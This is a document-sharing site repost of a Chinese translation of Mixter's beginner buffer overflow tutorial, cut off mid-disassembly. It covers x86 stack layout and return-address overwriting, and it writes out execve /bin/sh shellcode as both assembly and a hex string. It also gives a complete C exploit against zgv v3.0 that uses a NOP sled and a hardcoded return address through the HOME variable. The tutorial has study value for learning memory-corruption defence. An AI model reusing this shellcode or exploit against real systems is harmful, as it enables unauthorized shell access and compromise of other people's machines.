缓冲区溢出攻击初学者手册.docx

资源描述

缓冲区溢出攻击初学者手册.docx

《缓冲区溢出攻击初学者手册.docx》由会员分享，可在线阅读，更多相关《缓冲区溢出攻击初学者手册.docx（14页珍藏版）》请在冰点文库上搜索。

缓冲区溢出攻击初学者手册.docx

缓冲区溢出攻击初学者手册

缓冲区溢出会出现在和用户输入相关缓冲区内，在一般情况下，这已经变成了现代计算机和网络方面最大的安全隐患之一。

这是因为在程序的基础上很容易出现这种问题，但是这对于不了解或是无法获得源代码的使用者来说是不可能的，很多的类似问题就会被利用。

本文就的目的就是教会新手特别是C程序员，说明怎么利用这种溢出环境。

- Mixter

1 内存

注：

我在这里的描述方法为：

大多数计算机上内存作为进程的组织者，但是它依赖处理器结构的类型。

这是一个x86的例子，同时也可以应用在sparc上。

缓冲区溢出的攻击原理是覆盖不能重写随机输入和在进程中执行代码的内存。

要了解在什么地方和怎么发生的溢出，就让我们来看下内存是如何组织的。

页是使用和它相关地址的内存的一个部分，这就意味着内核的进程内存的初始化，这就没有必要知道在RAM中分配的物理地址。

进程内存由下面三个部分组成：

代码段，在这一段代码中的数据是通过处理器中执行的汇编指令。

该代码的执行是非线性的，它可以跳过代码，跳跃，在某种特定情况下调用函数。

以此，我们使用EIP指针，或是指针指令。

其中EIP指向的地址总是包含下一个执行代码。

数据段，变量空间和动态缓冲器。

堆栈段，这是用来给函数传递变量的和为函数变量提供空间。

栈的底部位于每一页的虚拟内存的末端，同时向下运动。

汇编命令PUSHL会增加栈的顶部，POPL会从栈的顶部移除项目并且把它们放到寄存器中。

为了直接访问栈寄存器，在栈的顶部有栈顶指针ESP。

2 函数

函数是一段代码段的代码，它被调用，执行一个任务，之后返回执行的前一个线程。

或是把参数传递给函数，通常在汇编语言中，看起来是这样的（这是一个很简单的例子，只是为了了解一下概念）。

memory addresscode

0x8054321pushl $0x0

0x8054322call $0x80543a0

0x8054327ret

0x8054328leave

...

0x80543a0popl %eax

0x80543a1addl $0x1337,%eax

0x80543a4ret

这会发生什么？

主函数调用了function（0）；

变量是0，主要把它压入栈中，同时调用该函数。

函数使用popl来获取栈中的变量。

完成后，返回0×8054327。

通常情况下，主函数要把EBP寄存器压入栈中，这是函数储存的和在结束后在储存的。

这就是帧指针的概念，允许函数使用自己的偏移地址，在对付攻击时就变的很无趣了。

因为函数将不会返回到原有的执行线程。

我们只需要知道栈是什么样的。

在顶部，我们有函数的内部缓冲区和函数变量。

在此之后，有保存的EBP寄存器（32位，4个字节），然后返回地址，是另外的4个字节。

再往下，还有要传递给函数的参数，这对我们来说没有意义。

在这种情况下，我们返回的地址是0×8054327。

在函数被调用时，它就会自动的存储到栈中。

如果代码中存在溢出的地方，这个返回值会被覆盖，并且指针指向内存中的下一个位置。

3 一个可以利用的程序实例

让我们假设我们要利用的函数为：

void lame （void） { char small[30]; gets （small）; printf（"%s\n", small）; }

main（） { lame （）; return 0; }

Compile and disassemble it:

# cc -ggdb blah.c -o blah

/tmp/cca017401.o:

In function 'lame':

/root/blah.c:

the 'gets'; function is dangerous and should not be used.

# gdb blah

/* short explanation:

gdb, the GNU debugger is used here to read the

binary file and disassemble it （translate bytes to assembler code） */

（gdb） disas main

Dump of assembler code for function main:

0x80484c8 :

pushl %ebp

0x80484c9 :

movl %esp,%ebp

0x80484cb :

call 0x80484a0

0x80484d0 :

leave

0x80484d1 :

ret

（gdb） disas lame

Dump of assembler code for function lame:

/* saving the frame pointer onto the stack right before the ret address */

0x80484a0 :

pushl %ebp

0x80484a1 :

movl %esp,%ebp

/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the

memory is allocated 4byte-wise （because the processor uses 32bit words）

this is the equivalent to:

char small[30]; */

0x80484a3 :

subl $0x20,%esp

/* load a pointer to small[30] （the space on the stack, which is located

at virtual address 0xffffffe0（%ebp）） on the stack, and call

the gets function:

gets（small）; */

0x80484a6 :

leal 0xffffffe0（%ebp）,%eax

0x80484a9 :

pushl %eax

0x80484aa :

call 0x80483ec

0x80484af :

addl $0x4,%esp

/* load the address of small and the address of "%s\n" string on stack

and call the print function:

printf（"%s\n", small）; */

0x80484b2 :

leal 0xffffffe0（%ebp）,%eax

0x80484b5 :

pushl %eax

0x80484b6 :

pushl $0x804852c

0x80484bb :

call 0x80483dc

0x80484c0 :

addl $0x8,%esp

/* get the return address, 0x80484d0, from stack and return to that address.

you don't see that explicitly here because it is done by the CPU as 'ret' */

0x80484c3 :

leave

0x80484c4 :

ret

End of assembler dump.

3a 程序溢出

# ./blah

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<- user input

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

# ./blah

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Segmentation fault （core dumped）

# gdb blah core

（gdb） info registers

eax:

0x24 36

ecx:

0x804852f 134513967

edx:

0x1 1

ebx:

0x11a3c8 1156040

esp:

0xbffffdb8 -1073742408

ebp:

0x787878 7895160

EBP位于0×787878，这就意味我们已经写入了超出缓冲区输入可以控制的范围。

0×78是十六进制的x。

该过程有32个字节的最大的缓冲器。

我们已经在内存中写入了比用户输入更多的数据，因此重写EBP，返回值的地址是‘xxxx’，这个过程会尝试在地址0×787878处重复执行，这就会导致段的错误。

3b 改变返回值地址

让我们尝试利用这个程序来返回lame（）来代替它的返回值，我们要改变返回值的地址从0x80484d0到0x80484cb，在内存中，我们有32字节的缓冲区空间，4个字节保存EBP，4个字节的RET。

下面是一个很简单的程序，把4个字节的返回地址变成一个1个字节字符缓冲区：

main（）

{

int i=0; char buf[44];

for （i=0;i<=40;i+=4）

*（long *） &buf[i] = 0x80484cb;

puts（buf）;

}

# ret

ËËËËËËËËËËË,

# （ret;cat）|./blah

test <- user input

ËËËËËËËËËËË,test

test <- user input

test

我们在这里使用这个程序运行了两次这个函数。

如果有溢出存在，函数的返回值地址是可以变的，从而改变程序的执行线程。

4 Shellcode

为了简单，Shellcode使用简单的汇编指令，我们写在栈上，然后更改返回地址，使它返回到栈内。

使用这个方法，我们可以把代码插入到一个脆弱的进程中，然后在栈中正确的执行它。

所以，让我们通过插入的汇编代码来运行一个Shell。

一个常见的调用命令是execve（），它可以加载和运行任意的二进制代码，终止当前执行的进程。

手册中提供我们的用法为：

int execve （const char *filename, char *const argv [], char *const envp[]）;

Lets get the details of the system call from glibc2:

# gdb /lib/libc.so.6

（gdb） disas execve

Dump of assembler code for function execve:

0x5da00 :

pushl %ebx

/* this is the actual syscall. before a program would call execve, it would

push the arguments in reverse order on the stack:

**envp, **argv, *filename */

/* put address of **envp into edx register */

0x5da01 :

movl 0x10（%esp,1）,%edx

/* put address of **argv into ecx register */

0x5da05 :

movl 0xc（%esp,1）,%ecx

/* put address of *filename into ebx register */

0x5da09 :

movl 0x8（%esp,1）,%ebx

/* put 0xb in eax register; 0xb == execve in the internal system call table */

0x5da0d :

movl $0xb,%eax

/* give control to kernel, to execute execve instruction */

0x5da12 :

int $0x80

0x5da14 :

popl %ebx

0x5da15 :

cmpl $0xfffff001,%eax

0x5da1a :

jae 0x5da1d <__syscall_error>

0x5da1c :

ret

结束汇编转存。

4a 使代码可移植

传统方式中，我们必须应用一个策略在内存中完成没有指导参数的Shellcode，通过给予它们在页存储上的精确位置，这只能在编译中完成。

一旦我们估计了shellcode的大小，我们能够使用指令jmp和call在执行线程向前或向后到达指定的字节。

为什么使用call？

call会自动的在栈内存储和返回地址，这个返回地址是在下一个call指令后的4个字节。

在call运行后放置一个正确的变量，我们间接的把地址压进了栈中，没有必要了解它。

0 jmp （skip Z bytes forward）

2 popl %esi

... put function（s） here ...

Z call <-Z+2> （skip 2 less than Z bytes backward, to POPL）

Z+5 .string （first variable）

（注：

如果你要写的代码比一个简单的shell还要复杂，你可以多次使用上面的代码。

字符串放在代码的后面。

你知道这些字符串的大小，因此一旦你知道第一个字符串的位置，就可以计算他们的相对位置。

）

4b Shellcode

global code_start/* we';ll need this later, dont mind it */

global code_end

.data

code_start:

jmp 0x17

popl %esi

movl %esi,0x8（%esi）/* put address of **argv behind shellcode,

0x8 bytes behind it so a /bin/sh has place */

xorl %eax,%eax/* put 0 in %eax */

movb %eax,0x7（%esi）/* put terminating 0 after /bin/sh string */

movl %eax,0xc（%esi）/* another 0 to get the size of a long word */

my_execve:

movb $0xb,%al/* execve（ */

movl %esi,%ebx/* "/bin/sh", */

leal 0x8（%esi）,%ecx/* & of "/bin/sh", */

xorl %edx,%edx/* NULL */

int $0x80/* ）; */

call -0x1c

.string "/bin/shX"/* X is overwritten by movb %eax,0x7（%esi） */

code_end:

（通过0×0相对偏移了0×17和-0x1c，编译，反汇编，看看shell代码的大小。

）

这是一个正在运行着的shellcode，虽然很小。

你至少要反汇编exit（）来调用和依附它（在调用之前）。

完成shellcode的正真的意义还包括避免任何二进制0代码和修改它，二进制代码不包含控制和小写字符，这将会过滤掉一些问题程序。

大多数是通过自己修改代码来完成的，如我们使用的mov %eax,0×7（%esi）指令。

我们用来取代X，但是在shellcode初始化中没有。

让我们测试下这些代码，把上面的代码保存为code.S同时把下面的文件保存为code.c：

extern void code_start（）;

extern void code_end（）;

#include

main（） { （（void （*）（void）） code_start）（）; }

# cc -o code code.S code.c

# ./code

bash#

现在你可以把shellcode转移到16进制字符缓冲区。

最好的方法就是把它打印出来：

#include

extern void code_start（）; extern void code_end（）;

main（） { fprintf（stderr,"%s",code_start）;

通过使用aconv –h或bin2c.pl来解析它，可以在

5 写一个利用

让我们看看如何把返回地址指向的shellcode进行压栈，写了一个简单的例子。

我们将要采用zgv，因为这是可以利用的一个最简单的方法。

# export HOME=`perl -e ';printf "a" x 2000''

# zgv

Segmentation fault （core dumped）

# gdb /usr/bin/zgv core

#0 0x61616161 in ?

（）

（gdb） info register esp

esp:

0xbffff574 -1073744524

那么，在故障时间时在栈顶，安全的假设是我们能够使用这作为我们shellcode的返回地址。

现在我们要在我们的缓冲区前增加一些NOP指令，所以我们没有必要关注对于内存中的精确开始我们shellcode预测的100%正确。

这个函数将会在我们的shellcode之前返回到栈，通过使用NOPs的方式来初始化JMP命令，跳转到CALL，跳转到popl，在栈中运行我们的代码。

记住，栈是这样的。

在最低级的内存地址，ESP指向栈的顶部，初始变量被储存，即缓冲器中的zgv储存了HOME环境变量。

在那之后，我们保存了EBP和前一个函数的返回地址。

我们必须要写8个字节或是更多在缓冲区后面，用栈中的新的地址来覆盖返回地址。

Zgv的缓冲器有1024个字节。

你可以通过扫视代码来发现，或是通过在脆弱的函数中搜索初始化的subl $0×400,%esp （=1024）。

我们可以把这些放在一起来利用。

5a zgv攻击实例

/* zgv v3.0 exploit by Mixter

buffer overflow tutorial - http:

//1337.tsx.org

sample exploit, works for example with precompiled

redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include

/* This is the minimal shellcode from the tutorial */

static char shellcode[]=

"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"

"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90

#define LEN 1032

#define RET 0xbffff574

int main（）

{

char buffer[LEN];

long retaddr = RET;

int i;

fprintf（stderr,"using address 0x%lx\n",retaddr）;

/* this fills the whole buffer with the return address, see 3b） */

for （i=0;i

*（long *）&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the

buffer size, so the shellcode and return address fits in comfortably */

for （i=0;i

*（buffer+i） = NOP;

/* after the end of the NOPs, we copy in the execve（） shellcode */

memcpy（buffer+i,shellcode,strlen（shellcode））;

/* export the variable, run zgv */

setenv（"HOME", buffer, 1）;

execlp（"zgv","zgv",NULL）;

return 0;

}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here

[ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function（） -> strcpy（smallbuffer,getenv（"HOME"））;

此时，zgv做不到边界检查，写入超出了smallbuffer，返回到main的地址被栈中的返回地址覆盖。

function（）离不开/ ret和栈中EIP指针。

0xbffff574 nop

0xbffff575 nop

0xbffff576 nop

0xbffff577 jmp $0x24 1

0xbffff579 popl %esi 3 <--\ |

[... shellcode star

展开阅读全文